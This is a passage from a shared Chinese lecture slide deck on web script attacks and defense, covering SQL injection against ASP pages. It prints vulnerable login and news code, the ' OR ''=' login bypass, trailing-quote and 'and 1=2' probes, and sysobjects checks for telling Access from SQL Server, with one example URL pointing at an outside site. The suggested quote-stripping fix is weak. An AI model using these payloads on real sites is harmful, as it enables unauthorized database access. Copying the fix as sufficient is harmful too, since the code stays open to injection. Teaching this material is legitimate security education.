資源描述:
《網(wǎng)絡(luò)腳本攻擊與防御ppt》由會員上傳分享���,免費在線閱讀����,更多相關(guān)內(nèi)容在教育資源-天天文庫��。
1����、第五章腳本攻擊與防御1SQL注入技術(shù)什么是SQL注入技術(shù)?SQL注入即是指攻擊者通過在應(yīng)用程序中預(yù)先定義好的查詢語句結(jié)尾加上額外的SQL語句元素�����,欺騙數(shù)據(jù)庫服務(wù)器執(zhí)行非授權(quán)的任意查詢��。分析一個經(jīng)典的SQL注入漏洞dimrsadmin1=request("admin")password1=request("password")setrs=server.CreateObject("ADODB.RecordSet")rs.open"select*fromadminwhereadmin='"&admin1&"'andpassword='"&password1&"'",conn,1ifrs.eofan
2�����、drs.bofthenresponse.write"alert('用戶名或密碼不正確�����!');"response.write"javascript:history.go(-1)"response.endelsesession("admin")=rs("admin")session("password")=rs("password")session("aleave")=rs("aleave")response.redirect"admin.asp"endifrs.closesetrs=nothing一個經(jīng)典的SQL注入漏洞分
3、析在用戶名和密碼那里都填入‘OR‘’=’�����,SQL語句被構(gòu)造成select*fromadminwhereadmin=‘'OR‘'=‘'andpassword=‘'OR‘'=‘‘意思是當admin為空或者空等于空��,password為空或者空等于空的時候整個查詢語句就為真�。如何來修補漏洞�?過濾掉其中的特殊字符。這里我們就過濾掉其中的單引號“'”�,即是把程序的頭兩行改為:admin1=replace(trim(request("admin")),"'","")password1=replace(trim(request("password")),"'","")判斷數(shù)據(jù)庫的類型服務(wù)器的IIS錯誤提示沒
4、關(guān)閉提交http://localhost/test/onews.asp?id=37’:1����、如果是Access數(shù)據(jù)庫,那么應(yīng)該返回:MicrosoftJETDatabaseEngine錯誤'80040e14'字符串的語法錯誤在查詢表達式'id=37''中�����。/onews.asp��,行8Eg:http://www.51dinggui.com/article.asp?id=102�、如果是SQLServer數(shù)據(jù)庫�,那么應(yīng)該返回:MicrosoftOLEDBProviderforODBCDrivers錯誤'80040e14'[Microsoft][ODBCSQLServerDriver][SQLServe
5����、r]字符串''之前有未閉合的引號。/onews.asp����,行8服務(wù)器的IIS錯誤提示關(guān)閉了根據(jù)Access和SQLServer自己的系統(tǒng)表來區(qū)分。Access是在系統(tǒng)表[msysobjects]中����,但在Web環(huán)境下讀該表會提示“沒有權(quán)限”,SQLServer是在表[sysobjects]中����,在Web環(huán)境下可正常讀取。提交:http://localhost/test/onews.asp?id=37and(selectcount(*)fromsysobjects)>0如果是Access數(shù)據(jù)庫��,因為不存在sysobjects表�,所以返回結(jié)果應(yīng)該和正常頁面有很大區(qū)別;如果是SQLServer��,則應(yīng)該返
6��、回一個查詢成功的正常頁面�����。1.1Access數(shù)據(jù)庫的注入把IE菜單=>工具=>Internet選項=>高級=>顯示友好HTTP錯誤信息前面的勾去掉,這樣可以顯示出現(xiàn)的錯誤信息��。分析一次完整的SQL注入����。<%owen=request("id")Setrsnews=Server.CreateObject("ADODB.RecordSet")sql="updatenewssethits=hits+1whereid="&cstr(request("id"))conn.executesqlsql="select*fromnewswhereid="&owenrsnews.Opensql,conn,1,1
7、title=rsnews("title")ifrsnews.eofandrsnews.bofthenresponse.Write("數(shù)據(jù)庫出錯")else%>http://localhost/test/onews.asp?id=37http://localhost/test/onews.asp?id=37and1=2sql=select*fromnewswhereid=37and1=2http://local
